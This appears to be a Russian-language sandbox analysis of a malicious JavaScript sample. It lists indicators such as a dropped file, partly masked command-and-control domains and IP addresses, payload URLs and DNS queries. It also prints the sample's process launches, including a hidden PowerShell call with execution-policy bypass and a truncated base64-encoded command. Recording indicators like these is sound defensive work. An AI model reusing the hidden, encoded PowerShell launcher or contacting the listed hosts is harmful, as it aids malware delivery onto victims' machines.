Техническая информация
- %ALLUSERSPROFILE%\interfluouspurchasers.hemisaprophytic
- 'gr#.###ro-cartel.com':80
- 'gr#.###ro-cartel.com':443
- 'x1.#.lencr.org':80
- '77.##.87.158':80
- '79.##7.248.163':80
- '91.##3.43.101':80
- '77.##.87.198':80
- http://91.##3.43.98/AGvZh8C/tZRfTbXCm
- http://x1.#.lencr.org/
- http://77.##.87.198/qfbfu/eV9e1y2
- 'gr#.###ro-cartel.com':443
- DNS ASK gr#.###ro-cartel.com
- DNS ASK x1.#.lencr.org
- '<SYSTEM32>\wscript.exe' "<PATH_SAMPLE>.js" PrefiguresUnwrapper OmnividentCointersecting (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABXAGgAbwByAGUAaABvAHUAcwBlAHMASQB6AGEAZgBhAHQAIAA9ACAAOQAyADMAOwAkAHQAcgBlAGEAcwBvAG4AcwAgAD0AIAAiAGYAaQBsAGkAb... (со скрытым окном)